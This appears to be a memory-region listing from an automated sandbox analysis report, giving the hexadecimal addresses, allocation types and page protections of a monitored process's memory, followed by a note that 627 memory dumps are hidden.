271AAED9000
|
heap
|
page read and write
|
||
|
2576F817000
|
heap
|
page read and write
|
||
|
148B000
|
heap
|
page read and write
|
||
|
24B91580000
|
heap
|
page read and write
|
||
|
29B1BBD0000
|
heap
|
page read and write
|
||
|
21C95F90000
|
heap
|
page read and write
|
||
|
271AB214000
|
heap
|
page read and write
|
||
|
2576F409000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2007EDD0000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
2576FBF0000
|
heap
|
page read and write
|
||
|
2570008B000
|
trusted library allocation
|
page read and write
|
||
|
2576D6D8000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
2576D740000
|
heap
|
page read and write
|
||
|
17F0BC10000
|
heap
|
page read and write
|
||
|
2576F81A000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF79625C000
|
unkown
|
page readonly
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
29B1B909000
|
heap
|
page read and write
|
||
|
147A43F0000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF888100000
|
trusted library allocation
|
page read and write
|
||
|
5D3F2FE000
|
stack
|
page read and write
|
||
|
DFD7178000
|
stack
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
DFD71FF000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
902476C000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1471000
|
heap
|
page read and write
|
||
|
1C008AF8000
|
heap
|
page read and write
|
||
|
7FF887EF4000
|
trusted library allocation
|
page read and write
|
||
|
1DA1CB40000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1603B720000
|
heap
|
page read and write
|
||
|
2576F353000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
DFD6CFE000
|
stack
|
page read and write
|
||
|
2576D7F4000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
DFD6C7E000
|
stack
|
page read and write
|
||
|
7FF887F00000
|
trusted library allocation
|
page read and write
|
||
|
7FF795D5E000
|
unkown
|
page write copy
|
||
|
29B1BB00000
|
heap
|
page read and write
|
||
|
1C434A50000
|
heap
|
page read and write
|
||
|
7FF8880E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF888220000
|
trusted library allocation
|
page read and write
|
||
|
4A32AFE000
|
unkown
|
page readonly
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1C60000
|
trusted library allocation
|
page read and write
|
||
|
2576D650000
|
heap
|
page read and write
|
||
|
2576F5D2000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
25700231000
|
trusted library allocation
|
page read and write
|
||
|
2576F5D8000
|
heap
|
page read and write
|
||
|
29B1BBD4000
|
heap
|
page read and write
|
||
|
147A44D0000
|
heap
|
page read and write
|
||
|
7FF887EFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
26506E30000
|
heap
|
page read and write
|
||
|
2576F850000
|
heap
|
page read and write
|
||
|
E8317E000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF887FA6000
|
trusted library allocation
|
page read and write
|
||
|
DFD6E7E000
|
stack
|
page read and write
|
||
|
1DA1CB60000
|
heap
|
page read and write
|
||
|
7FF8880C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2570162F000
|
trusted library allocation
|
page read and write
|
||
|
257016A1000
|
trusted library allocation
|
page read and write
|
||
|
1DA1C950000
|
heap
|
page read and write
|
||
|
CFF7EFE000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1EFDBFA9000
|
heap
|
page read and write
|
||
|
1EFC97F000
|
stack
|
page read and write
|
||
|
2576D600000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2570162B000
|
trusted library allocation
|
page read and write
|
||
|
7FF8880A1000
|
trusted library allocation
|
page read and write
|
||
|
2576F6C7000
|
heap
|
page execute and read and write
|
||
|
1489000
|
heap
|
page read and write
|
||
|
1EFDC0C0000
|
heap
|
page read and write
|
||
|
1DA1C959000
|
heap
|
page read and write
|
||
|
4A32A7E000
|
stack
|
page read and write
|
||
|
140000000
|
unkown
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1DA1CD04000
|
heap
|
page read and write
|
||
|
12BA8840000
|
heap
|
page read and write
|
||
|
2576D73E000
|
heap
|
page read and write
|
||
|
7FF795BFB000
|
unkown
|
page readonly
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
156F000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
A9D917E000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1C434A58000
|
heap
|
page read and write
|
||
|
1EFDC0A0000
|
heap
|
page read and write
|
||
|
147A4500000
|
unkown
|
page read and write
|
||
|
271AAEA0000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
17F0BA00000
|
heap
|
page read and write
|
||
|
2007EDD4000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF795D50000
|
unkown
|
page readonly
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
140009000
|
unkown
|
page read and write
|
||
|
ED11E7D000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1C008AF0000
|
heap
|
page read and write
|
||
|
2576D7F0000
|
heap
|
page read and write
|
||
|
29B1BA00000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
12BA8849000
|
heap
|
page read and write
|
||
|
2844E5F0000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1C434CF0000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
284CEA70000
|
heap
|
page read and write
|
||
|
DFD6D7E000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1F834ED000
|
stack
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF795D51000
|
unkown
|
page execute read
|
||
|
1454000
|
heap
|
page read and write
|
||
|
17F0BD94000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
257016B7000
|
trusted library allocation
|
page read and write
|
||
|
7FF887EF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
42D38ED000
|
stack
|
page read and write
|
||
|
21C96320000
|
heap
|
page read and write
|
||
|
DFD6983000
|
stack
|
page read and write
|
||
|
1481000
|
heap
|
page read and write
|
||
|
1479000
|
heap
|
page read and write
|
||
|
CE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF796259000
|
unkown
|
page readonly
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
25710010000
|
trusted library allocation
|
page read and write
|
||
|
2576F6C0000
|
heap
|
page execute and read and write
|
||
|
25701623000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
D03077F000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
DFD6EFE000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
889000
|
heap
|
page read and write
|
||
|
1603B754000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
8C5000
|
heap
|
page read and write
|
||
|
7FF888130000
|
trusted library allocation
|
page read and write
|
||
|
25701C1C000
|
trusted library allocation
|
page read and write
|
||
|
2576F310000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
25701620000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
2844E8C0000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF795BF0000
|
unkown
|
page readonly
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
87B000
|
stack
|
page read and write
|
||
|
166E000
|
stack
|
page read and write
|
||
|
2007ECE0000
|
unkown
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2576D657000
|
heap
|
page read and write
|
||
|
DFD737F000
|
stack
|
page read and write
|
||
|
26506E50000
|
heap
|
page read and write
|
||
|
1EFDC190000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1EFC87C000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF8881E0000
|
trusted library allocation
|
page read and write
|
||
|
13DF000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2007EAC0000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
17F0BD90000
|
heap
|
page read and write
|
||
|
67930FE000
|
stack
|
page read and write
|
||
|
25701633000
|
trusted library allocation
|
page read and write
|
||
|
7FF888240000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF887F0B000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2576F5C3000
|
heap
|
page read and write
|
||
|
2151E9C0000
|
unkown
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
166BE390000
|
heap
|
page read and write
|
||
|
2007EB10000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
25701663000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
CE0000
|
heap
|
page readonly
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
DFD6DFD000
|
stack
|
page read and write
|
||
|
7FF8881C0000
|
trusted library allocation
|
page read and write
|
||
|
1603B750000
|
heap
|
page read and write
|
||
|
7FF888140000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2576F56A000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
257016A5000
|
trusted library allocation
|
page read and write
|
||
|
CFF7BAE000
|
stack
|
page read and write
|
||
|
7FF888200000
|
trusted library allocation
|
page read and write
|
||
|
1DA1CA60000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1C008A70000
|
heap
|
page read and write
|
||
|
25710001000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2844E4F0000
|
heap
|
page read and write
|
||
|
42D38FD000
|
stack
|
page read and write
|
||
|
284CEBC0000
|
heap
|
page read and write
|
||
|
A9D927F000
|
stack
|
page read and write
|
||
|
DFD72FE000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF888010000
|
trusted library allocation
|
page execute and read and write
|
||
|
52456DC000
|
stack
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
2576D774000
|
heap
|
page read and write
|
||
|
147A44F0000
|
unkown
|
page read and write
|
||
|
29B1B900000
|
heap
|
page read and write
|
||
|
2007EB16000
|
heap
|
page read and write
|
||
|
978000
|
heap
|
page read and write
|
||
|
E82D0D000
|
stack
|
page read and write
|
||
|
D4AFF1C000
|
stack
|
page read and write
|
||
|
1C60000
|
trusted library allocation
|
page read and write
|
||
|
2576D7B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888210000
|
trusted library allocation
|
page read and write
|
||
|
271AAE90000
|
heap
|
page read and write
|
||
|
8E0000
|
heap
|
page read and write
|
||
|
1C008970000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
25701C20000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
4131FF000
|
stack
|
page read and write
|
||
|
21C96325000
|
heap
|
page read and write
|
||
|
1DA1CD00000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
25700001000
|
trusted library allocation
|
page read and write
|
||
|
2576D698000
|
heap
|
page read and write
|
||
|
7FF888120000
|
trusted library allocation
|
page read and write
|
||
|
6E00000
|
direct allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
284CE990000
|
heap
|
page read and write
|
||
|
7800000
|
direct allocation
|
page read and write
|
||
|
25701665000
|
trusted library allocation
|
page read and write
|
||
|
12BA8A10000
|
heap
|
page read and write
|
||
|
17F0BBF0000
|
heap
|
page read and write
|
||
|
3200000
|
direct allocation
|
page read and write
|
||
|
D15F07D000
|
stack
|
page read and write
|
||
|
21C96068000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
5D3F3FE000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
ED1207E000
|
stack
|
page read and write
|
||
|
140007000
|
unkown
|
page readonly
|
||
|
147A4855000
|
heap
|
page read and write
|
||
|
26506EC8000
|
heap
|
page read and write
|
||
|
1F835EF000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2576F3F0000
|
heap
|
page execute and read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
176F000
|
stack
|
page read and write
|
||
|
67931FE000
|
stack
|
page read and write
|
||
|
147A4850000
|
heap
|
page read and write
|
||
|
216FA337000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
5D3EFCD000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
B60000
|
heap
|
page read and write
|
||
|
2151E860000
|
heap
|
page read and write
|
||
|
2576F2E0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
14000A000
|
unkown
|
page readonly
|
||
|
12BA8780000
|
heap
|
page read and write
|
||
|
166BE2E0000
|
heap
|
page read and write
|
||
|
284CEA90000
|
heap
|
page read and write
|
||
|
7FF8880F0000
|
trusted library allocation
|
page read and write
|
||
|
DFD6FF9000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
166BE2F0000
|
heap
|
page read and write
|
||
|
2007EDE0000
|
unkown
|
page read and write
|
||
|
2576F6D0000
|
heap
|
page read and write
|
||
|
1C60000
|
trusted library allocation
|
page read and write
|
||
|
D15F27E000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF795E80000
|
unkown
|
page write copy
|
||
|
7DF431DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7960FC000
|
unkown
|
page readonly
|
There are 627 hidden memdumps, click here to show them.